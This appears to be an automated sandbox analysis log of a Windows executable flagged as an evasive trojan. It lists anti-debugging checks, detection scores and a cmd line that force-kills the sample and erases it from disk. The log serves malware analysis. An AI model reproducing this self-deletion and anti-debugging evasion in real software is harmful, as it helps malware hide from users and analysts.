Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0042948A	0_2_0042948A
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00403D70	0_2_00403D70
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00427509	0_2_00427509
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00431D94	0_2_00431D94
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00404620	0_2_00404620
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00404FB0	0_2_00404FB0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00824887	0_2_00824887
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_008269F6	0_2_008269F6
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00845287	0_2_00845287
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00828217	0_2_00828217
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00824A67	0_2_00824A67
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00824387	0_2_00824387
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00825BAE	0_2_00825BAE
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00833B0A	0_2_00833B0A
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082F4A7	0_2_0082F4A7
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_008495D1	0_2_008495D1
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00833D3C	0_2_00833D3C
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_008406BF	0_2_008406BF
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00837EE0	0_2_00837EE0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_008496F1	0_2_008496F1
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00823FD7	0_2_00823FD7
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082671B	0_2_0082671B

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: String function: 0040E1D0 appears 54 times
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: String function: 0082E437 appears 54 times

Source: qjrOWCCE58.exe

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: qjrOWCCE58.exe	Virustotal: Detection: 33%
Source: qjrOWCCE58.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_004024E0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

0_2_004024E0

Source: qjrOWCCE58.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\qjrOWCCE58.exe "C:\Users\user\Desktop\qjrOWCCE58.exe"
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 656
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 772
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 796
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 628
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 908
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 916
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "qjrOWCCE58.exe" /f & erase "C:\Users\user\Desktop\qjrOWCCE58.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "qjrOWCCE58.exe" /f
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "qjrOWCCE58.exe" /f & erase "C:\Users\user\Desktop\qjrOWCCE58.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "qjrOWCCE58.exe" /f	Jump to behavior

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1592

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "qjrOWCCE58.exe")

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: `a}{	0_2_00407FB0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: MFE.	0_2_00407FB0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: ZK]Z	0_2_00407FB0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: ZK]Z	0_2_00407FB0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: 0\|C	0_2_00828217
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: `a}{	0_2_00828217
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: MFE.	0_2_00828217
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: ZK]Z	0_2_00828217
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Command line argument: ZK]Z	0_2_00828217

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE842.tmp

Jump to behavior

Source: classification engine

Classification label: mal60.troj.evad.winEXE@12/28@0/0

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

0_2_00401420

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: qjrOWCCE58.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\ciyicu.pdb source: qjrOWCCE58.exe
Source:	Binary string: *'9C:\ciyicu.pdb source: qjrOWCCE58.exe

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0042F1A5 push esi; ret	0_2_0042F1AE
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0040DCAA push ecx; ret	0_2_0040DCBD
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0042B611 push esp; iretd	0_2_0042B616
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0042C746 pushad ; retf	0_2_0042C74D
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0042C72E push eax; retf	0_2_0042C745
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0084113F push esp; retf	0_2_00841147
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082DF11 push ecx; ret	0_2_0082DF24

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

API coverage: 5.3 %

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,

0_2_00404FB0

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00403D70 Sleep,Sleep,FindFirstFileA,FindNextFileA,Sleep,FindNextFileA,FindClose,Sleep,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	0_2_00403D70
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_004225FD FindFirstFileExW,	0_2_004225FD
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00842864 FindFirstFileExW,	0_2_00842864
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00823FD7 FindFirstFileA,FindClose,GetTempPathA,__Init_thread_footer,GetTempPathA,__Init_thread_footer,GetTempPathA,__Init_thread_footer,GetTempPathA,__Init_thread_footer,	0_2_00823FD7

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_00411B5B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00411B5B

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0041637F mov eax, dword ptr fs:[00000030h]	0_2_0041637F
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0041EBEF mov eax, dword ptr fs:[00000030h]	0_2_0041EBEF
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082092B mov eax, dword ptr fs:[00000030h]	0_2_0082092B
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00820D90 mov eax, dword ptr fs:[00000030h]	0_2_00820D90
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_008365E6 mov eax, dword ptr fs:[00000030h]	0_2_008365E6
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0083EE56 mov eax, dword ptr fs:[00000030h]	0_2_0083EE56

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_004024E0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

0_2_004024E0

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_00402800 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

0_2_00402800

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00411B5B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00411B5B
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0040D3C2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040D3C2
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0040DDE5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040DDE5
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0040DF79 SetUnhandledExceptionFilter,	0_2_0040DF79
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082E04C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0082E04C
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082E1E0 SetUnhandledExceptionFilter,	0_2_0082E1E0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00831DC2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00831DC2
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0082D629 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0082D629

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "qjrOWCCE58.exe" /f

Jump to behavior

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "qjrOWCCE58.exe" /f & erase "C:\Users\user\Desktop\qjrOWCCE58.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "qjrOWCCE58.exe" /f			Jump to behavior

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_0042585C
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_00425811
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_004258F7
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00425982
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_0041CACF
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,	0_2_00425BD5
